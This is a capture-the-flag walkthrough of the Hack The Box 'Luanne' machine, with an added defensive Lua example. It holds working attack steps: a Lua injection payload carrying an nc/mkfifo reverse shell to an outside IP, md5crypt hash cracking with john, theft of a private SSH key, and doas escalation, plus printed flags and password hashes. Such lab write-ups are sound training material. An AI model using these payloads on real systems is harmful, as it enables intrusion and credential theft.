Hack-The-Box-walkthrough[luanne]

Introduction

OS: Other
Difficulty: Easy
Points: 20
Release: 28 Nov 2020
IP: 10.10.10.218

  • my htb rank

Information gathering

First, run nmap as usual.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.218
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
80/tcp open http nginx 1.19.0
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# nmap -sV -sC -v -p 22,80,9001 10.10.10.218
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp open http nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Port-80

It asks us for a username and password.

The nmap result also points us to a robots.txt.

Let’s check that out quickly.

User-agent: *
Disallow: /weather #returning 404 but still harvesting cities

There is one directory, /weather, in the disallow entries.

Let’s check that directory.

Hmm, it returns 404 Not Found.

Let’s use gobuster to enumerate inside the /weather directory.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# gobuster dir -u http://10.10.10.218/weather/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.218/weather/
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/04 01:40:43 Starting gobuster
===============================================================
/forecast (Status: 200)

It found one more interesting directory, /forecast.

It says no city specified, use city=list.

Let’s use this in the URL.

http://10.10.10.218/weather/forecast?city=list

{"code": 200,"cities": ["London","Manchester","Birmingham","Leeds","Glasgow","Southampton","Liverpool","Newcastle","Nottingham","Sheffield","Bristol","Belfast","Leicester"]}

It lists all the cities. Let’s choose Leeds.

http://10.10.10.218/weather/forecast?city=Leeds

{"code": 200,"city": "Leeds","list": [{"date": "2020-12-04","weather": {"description": "snowy","temperature": {"min": "12","max": "46"},"pressure": "1799","humidity": "92","wind": {"speed": "2.1975513692014","degree": "102.76822959445"}}},{"date": "2020-12-05","weather": {"description": "partially cloudy","temperature": {"min": "15","max": "43"},"pressure": "1365","humidity": "51","wind": {"speed": "4.9522297247313","degree": "262.63571172766"}}},{"date": "2020-12-06","weather": {"description": "sunny","temperature": {"min": "19","max": "30"},"pressure": "1243","humidity": "13","wind": {"speed": "1.8041767538525","degree": "48.400944394059"}}},{"date": "2020-12-07","weather": {"description": "sunny","temperature": {"min": "30","max": "34"},"pressure": "1513","humidity": "84","wind": {"speed": "2.6126398323104","degree": "191.63755226741"}}},{"date": "2020-12-08","weather": {"description": "partially cloudy","temperature": {"min": "30","max": "36"},"pressure": "1772","humidity": "53","wind": {"speed": "2.7699138359167","degree": "104.89152945159"}}}]}

Nothing interesting in the output.

After some trial and error and reading the Hack The Box forums, everyone was talking about Lua. I think Lua is related to the machine name.

Let’s try some Lua syntax.

http://10.10.10.218/weather/forecast?city=Leeds%22);%27print(

It gives us an error:

<br>Lua error: /usr/local/webapi/weather.lua:49: attempt to call a nil value

Now I am confident that we can get a reverse shell with Lua.
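For the defender's side of this bug, here is an added example (not the box's real weather.lua, which is never shown on this page): a hypothetical reconstruction of the injection-prone pattern, where the city parameter is spliced into Lua source and run with load(), beside a hardened handler that validates the parameter against the city allowlist and never builds code from input. The lookup_forecast stub and the Lua 5.2+ load() environment are assumptions.

```lua
-- Added example, not code from the Luanne box. Assumes Lua 5.2+ (load with env).
local CITIES = { "London", "Manchester", "Birmingham", "Leeds", "Glasgow",
  "Southampton", "Liverpool", "Newcastle", "Nottingham", "Sheffield",
  "Bristol", "Belfast", "Leicester" }

-- Stand-in for the real forecast lookup (hypothetical; the page never shows it).
local function lookup_forecast(city)
  return { code = 200, city = city, list = {} }
end

-- VULNERABLE (assumed pattern): the query value is pasted into Lua source and
-- executed. A value that closes the quote and the call, then appends its own
-- statements and a "--" comment, runs as code with the server's privileges,
-- which is exactly what the walkthrough's forecast?city= payload does.
local function forecast_vulnerable(city)
  local src = "return lookup_forecast('" .. city .. "')"
  local chunk, err = load(src, "weather", "t", { lookup_forecast = lookup_forecast })
  if not chunk then error("Lua error: " .. err) end
  return chunk()
end

-- HARDENED: treat the parameter as data. Reject anything that is not one of
-- the known cities (or the literal "list") and call the lookup directly.
local ALLOWED = {}
for _, c in ipairs(CITIES) do ALLOWED[c] = true end

local function forecast_hardened(city)
  if city == "list" then return { code = 200, cities = CITIES } end
  if type(city) ~= "string" or not ALLOWED[city] then
    return { code = 400, error = "unknown city" }
  end
  return lookup_forecast(city)
end

-- Demo: a legitimate city works in both handlers; an injection-shaped value
-- (quote, parenthesis, semicolon) is rejected by the hardened one before any
-- code could be generated from it.
print(forecast_vulnerable("Leeds").code)                     -- 200
print(forecast_hardened("Leeds").code)                       -- 200
print(forecast_hardened("Leeds');os.execute('id')--").code)  -- 400
```

The detection angle is the same as the error on this page: a 500 with "Lua error: ... attempt to call a nil value" on a parameter that should only ever be a city name is a strong sign someone is probing for code injection.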

  • gtfobins-lua

  • mkfifo

After reading some articles, I created a reverse shell payload.

http://10.10.10.218/weather/forecast?city=Leeds');os.execute("rm /tmp/f;mkfifo /tmp/luci;cat /tmp/luci|/bin/sh -i 2>&1|nc 10.10.14.3 9001 >/tmp/luci")--

URL-encode this to the following:

http://10.10.10.218/weather/forecast?city=Leeds%27%29%3b%6f%73%2e%65%78%65%63%75%74%65%28%22%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%6c%75%63%69%3b%63%61%74%20%2f%74%6d%70%2f%6c%75%63%69%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%30%2e%31%34%2e%33%20%39%30%30%31%20%3e%2f%74%6d%70%2f%6c%75%63%69%22%29%2d%2d

Open your netcat listener.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.218.
Ncat: Connection from 10.10.10.218:65489.
sh: can't access tty; job control turned off
$ id
uid=24(_httpd) gid=24(_httpd) groups=24(_httpd)
$ whoami
_httpd

Boom, we got a reverse shell as _httpd.

After some enumeration I found an interesting file, .htpasswd, in /var/www/.

$ ls -la
total 20
drwxr-xr-x 2 root wheel 512 Nov 25 11:27 .
drwxr-xr-x 24 root wheel 512 Nov 24 09:55 ..
-rw-r--r-- 1 root wheel 47 Sep 16 15:07 .htpasswd
-rw-r--r-- 1 root wheel 386 Sep 17 20:56 index.html
-rw-r--r-- 1 root wheel 78 Nov 25 11:38 robots.txt
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

There is a hash for webapi_user.

Let’s try to crack it with john.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# john -w=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iamthebest (?)
1g 0:00:00:00 DONE (2020-12-04 02:01) 7.142g/s 21942p/s 21942c/s 21942C/s my3kids..ANTHONY
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And we got the password for webapi_user: iamthebest.

But the problem is that su and sudo are not working.

Let’s use these credentials on the web.

webapi_user:iamthebest

There is nothing interesting.

Let’s do some manual enumeration inside the box.

Let’s check which services are running inside the box.

$ netstat -ant
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.218.65489 10.10.14.3.9001 ESTABLISHED
tcp 0 0 127.0.0.1.3000 127.0.0.1.65490 CLOSE_WAIT
tcp 0 0 127.0.0.1.65490 127.0.0.1.3000 FIN_WAIT_2
tcp 0 0 127.0.0.1.3000 *.* LISTEN
tcp 0 0 127.0.0.1.3001 *.* LISTEN
tcp 0 0 *.80 *.* LISTEN
tcp 0 0 *.22 *.* LISTEN
tcp 0 0 *.9001 *.* LISTEN
Active Internet6 connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp6 0 0 *.22 *.* LISTEN
Active UNIX domain sockets
Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
fffff67d7a76b9e0 stream 0 0 0 fffff67d7a76b900 0 0
fffff67d7a76b900 stream 0 0 0 fffff67d7a76b9e0 0 0
fffff67d7a76b510 stream 0 0 fffff67e28af5c08 0 0 0 /var/supervisord/run/supervisord.sock.340
fffff67d7a76bdd0 dgram 0 0 0 fffff67d7a76b3c0 0 fffff67d7a76bb30 -> /var/run/log
fffff67d7a76b7b0 dgram 0 0 0 fffff67d7a76b3c0 0 0 -> /var/run/log
fffff67d7a76b820 dgram 0 0 0 0 0 0
fffff67d7a76bb30 dgram 0 0 0 fffff67d7a76b3c0 0 fffff67d7a76b7b0 -> /var/run/log
fffff67d7a76b3c0 dgram 0 0 fffff67e2b920040 0 fffff67d7a76bdd0 0 /var/run/log

There is a port 3001 listening on localhost. Let’s check this real quick.

$ nc 127.0.0.1 3001
cat /etc/passwd
HTTP/0.9 404 Not Found
Content-Type: text/html
Content-Length: 217
Server: bozohttpd/20190228

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found</h1>
/etc/passwd: <pre>This item has not been found</pre>
<hr><address><a href="//luanne.htb:3001/">luanne.htb:3001</a></address>
</body></html>

Let’s curl that web server inside the machine.

$ curl http://127.0.0.1:3000/
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 199 100 199 0 0 99500 0 --:--:-- --:--:-- --:--:-- 99500
<html><head><title>401 Unauthorized</title></head>
<body><h1>401 Unauthorized</h1>
/: <pre>No authorization</pre>
<hr><address><a href="//127.0.0.1:3000/">127.0.0.1:3000</a></address>
</body></html>

It says Unauthorized. Let’s try the credentials we cracked.

$ curl --user webapi_user:iamthebest http://127.0.0.1:3001/
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 386 100 386 0 0 125k 0 --:--:-- --:--:-- --:--:-- 125k
<!doctype html>
<html>
<head>
<title>Index</title>
</head>
<body>
<p><h3>Weather Forecast API</h3></p>
<p><h4>List available cities:</h4></p>
<a href="/weather/forecast?city=list">/weather/forecast?city=list</a>
<p><h4>Five day forecast (London)</h4></p>
<a href="/weather/forecast?city=London">/weather/forecast?city=London</a>
<hr>
</body>
</html>

After some trial and error I found a way to get the id_rsa file.

First, let’s check the /etc/passwd file to see which users the box has.

$ cat /etc/passwd
root:*:0:0:Charlie &:/root:/bin/sh
toor:*:0:0:Bourne-again Superuser:/root:/bin/sh
daemon:*:1:1:The devil himself:/:/sbin/nologin
operator:*:2:5:System &:/usr/guest/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
games:*:7:13:& pseudo-user:/usr/games:/sbin/nologin
postfix:*:12:12:& pseudo-user:/var/spool/postfix:/sbin/nologin
named:*:14:14:& pseudo-user:/var/chroot/named:/sbin/nologin
ntpd:*:15:15:& pseudo-user:/var/chroot/ntpd:/sbin/nologin
sshd:*:16:16:& pseudo-user:/var/chroot/sshd:/sbin/nologin
_pflogd:*:18:18:& pseudo-user:/var/chroot/pflogd:/sbin/nologin
_rwhod:*:19:19:& pseudo-user:/var/rwho:/sbin/nologin
_proxy:*:21:21:Proxy Services:/nonexistent:/sbin/nologin
_timedc:*:22:22:& pseudo-user:/nonexistent:/sbin/nologin
_sdpd:*:23:23:& pseudo-user:/nonexistent:/sbin/nologin
_httpd:*:24:24:& pseudo-user:/var/www:/sbin/nologin
_mdnsd:*:25:25:& pseudo-user:/nonexistent:/sbin/nologin
_tests:*:26:26:& pseudo-user:/nonexistent:/sbin/nologin
_tcpdump:*:27:27:& pseudo-user:/var/chroot/tcpdump:/sbin/nologin
_tss:*:28:28:& pseudo-user:/var/tpm:/sbin/nologin
_rtadvd:*:30:30:& pseudo-user:/var/chroot/rtadvd:/sbin/nologin
_unbound:*:32:32:& pseudo-user:/var/chroot/unbound:/sbin/nologin
_nsd:*:33:33:& pseudo-user:/var/chroot/nsd:/sbin/nologin
uucp:*:66:1:UNIX-to-UNIX Copy:/nonexistent:/sbin/nologin
nobody:*:32767:39:Unprivileged user:/nonexistent:/sbin/nologin
r.michaels:*:1000:100::/home/r.michaels:/bin/ksh
nginx:*:1001:1000:NGINX server user:/var/db/nginx:/sbin/nologin
dbus:*:1002:1001:System message bus:/var/run/dbus:/sbin/nologin

After some trial and random guessing: there is a user called r.michaels.

Let’s grab his id_rsa file.

$ curl --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2610 100 2610 0 0 637k 0 --:--:-- --:--:-- --:--:-- 637k
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

Let’s ssh inside the box.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# chmod 600 id_rsa
┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# ssh -i id_rsa r.michaels@10.10.10.218
The authenticity of host '10.10.10.218 (10.10.10.218)' can't be established.
ECDSA key fingerprint is SHA256:KB1gw0t+80YeM3PEDp7AjlTqJUN+gdyWKXoCrXn7AZo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.218' (ECDSA) to the list of known hosts.
Last login: Fri Sep 18 07:06:51 2020
NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020

Welcome to NetBSD!

luanne$ id
uid=1000(r.michaels) gid=100(users) groups=100(users)
luanne$ whoami
r.michaels
luanne$ ls
backups devel public_html user.txt
luanne$ cat user.txt
ea5f0ce6a917b0be1eabc7f9218febc0

And we got user.txt.

Now let me explain why ~r.michaels/.ssh/id_rsa does not work.

If we look at r.michaels’s home directory, there is a folder called public_html, and inside it there is an id_rsa file.

This folder is shared through the web server, so we can access the public_html folder from there.

luanne$ ls
backups devel public_html user.txt
luanne$ cd public_html/
luanne$ ls
id_rsa

Privilege escalation

I found an interesting file called devel_backup-2020-09-16.tar.gz.enc inside backups in r.michaels’s home directory.

luanne$ pwd
/home/r.michaels/backups
luanne$ ls
devel_backup-2020-09-16.tar.gz.enc

But it’s a .enc file, so we can’t extract it with tar -xf.

After some Google searching I found a way to extract the .enc file.

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup-2020-09-16.tar.gz
luanne$ netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup-2020-09-16.tar.gz
signature 2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14
Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a
uid RSA 2048-bit key <r.michaels@localhost>
luanne$ cd /tmp
luanne$ ls
devel_backup-2020-09-16.tar.gz

Now it’s a .tar.gz file, so we can extract it with tar -xf.

luanne$ cd /tmp
luanne$ ls
devel_backup-2020-09-16.tar.gz
luanne$ tar -xf devel_backup-2020-09-16.tar.gz
luanne$ ls
devel-2020-09-16 devel_backup-2020-09-16.tar.gz
luanne$ cd devel-2020-09-16
luanne$ ls
webapi www
luanne$ cd www
luanne$ ls
index.html
luanne$ ls -la
total 32
drwxr-xr-x 2 r.michaels wheel 96 Sep 16 15:03 .
drwxr-x--- 4 r.michaels wheel 96 Sep 16 15:02 ..
-rw-r--r-- 1 r.michaels wheel 47 Sep 16 18:14 .htpasswd
-rw-r--r-- 1 r.michaels wheel 378 Sep 16 15:03 index.html
luanne$ cat .htpasswd
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

We got another hash, but this one is different from the previous hash.

webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

Let’s try to crack this hash with john.

┌──(root💀kali)-[~/hackthebox/machine/luanne]
└─# john -w=/usr/share/wordlists/rockyou.txt hash1
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littlebear (?)
1g 0:00:00:00 DONE (2020-12-04 02:24) 16.66g/s 217600p/s 217600c/s 217600C/s jayar..hello11
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And we got the password:

webapi_user:littlebear

We got the password: littlebear.

But the problem is we can’t change user because sudo is not working.

After some Google searching I found a way to switch user to root.

  • doas — execute commands as another user
luanne$ doas -u root /bin/sh
Password:
sh: Cannot determine current working directory
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
# whoami
root
# pwd
pwd: getcwd() failed: No such file or directory
# cat /root/root.txt
7a9b5c206e8e8ba09bb99bd113675f66

And we got root.txt and finished the box.

  • root hash:
# cat master.passwd
root:$sha1$23801$4UJhvV0t$hToalyVeYBLnwnyB6uvsIJfPPCC4:0:0::0:0:Charlie &:/root:/bin/sh
toor:*:0:0::0:0:Bourne-again Superuser:/root:/bin/sh
daemon:*:1:1::0:0:The devil himself:/:/sbin/nologin
operator:*:2:5::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/sbin/nologin
games:*:7:13::0:0:& pseudo-user:/usr/games:/sbin/nologin
postfix:*:12:12::0:0:& pseudo-user:/var/spool/postfix:/sbin/nologin
named:*:14:14::0:0:& pseudo-user:/var/chroot/named:/sbin/nologin
ntpd:*:15:15::0:0:& pseudo-user:/var/chroot/ntpd:/sbin/nologin
sshd:*:16:16::0:0:& pseudo-user:/var/chroot/sshd:/sbin/nologin
_pflogd:*:18:18::0:0:& pseudo-user:/var/chroot/pflogd:/sbin/nologin
_rwhod:*:19:19::0:0:& pseudo-user:/var/rwho:/sbin/nologin
_proxy:*:21:21::0:0:Proxy Services:/nonexistent:/sbin/nologin
_timedc:*:22:22::0:0:& pseudo-user:/nonexistent:/sbin/nologin
_sdpd:*:23:23::0:0:& pseudo-user:/nonexistent:/sbin/nologin
_httpd:*:24:24::0:0:& pseudo-user:/var/www:/sbin/nologin
_mdnsd:*:25:25::0:0:& pseudo-user:/nonexistent:/sbin/nologin
_tests:*:26:26::0:0:& pseudo-user:/nonexistent:/sbin/nologin
_tcpdump:*:27:27::0:0:& pseudo-user:/var/chroot/tcpdump:/sbin/nologin
_tss:*:28:28::0:0:& pseudo-user:/var/tpm:/sbin/nologin
_rtadvd:*:30:30::0:0:& pseudo-user:/var/chroot/rtadvd:/sbin/nologin
_unbound:*:32:32::0:0:& pseudo-user:/var/chroot/unbound:/sbin/nologin
_nsd:*:33:33::0:0:& pseudo-user:/var/chroot/nsd:/sbin/nologin
uucp:*:66:1::0:0:UNIX-to-UNIX Copy:/nonexistent:/sbin/nologin
nobody:*:32767:39::0:0:Unprivileged user:/nonexistent:/sbin/nologin
r.michaels:$sha1$24334$unLQu/.W$CtjrV4vz9ansOLIXDJMlzu1gSPC3:1000:100::0:0::/home/r.michaels:/bin/ksh
nginx:*************:1001:1000::0:0:NGINX server user:/var/db/nginx:/sbin/nologin
dbus:*************:1002:1001::0:0:System message bus:/var/run/dbus:/sbin/nologin

Summary of knowledge

  • gobuster directory fuzzing
  • use Lua syntax, GTFOBins and mkfifo to get a reverse shell with Lua
  • crack the md5crypt-long hash with john
  • use the id_rsa file to log in via ssh
  • use netpgp to extract the .enc file
  • privilege escalation via doas (execute commands as another user)

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…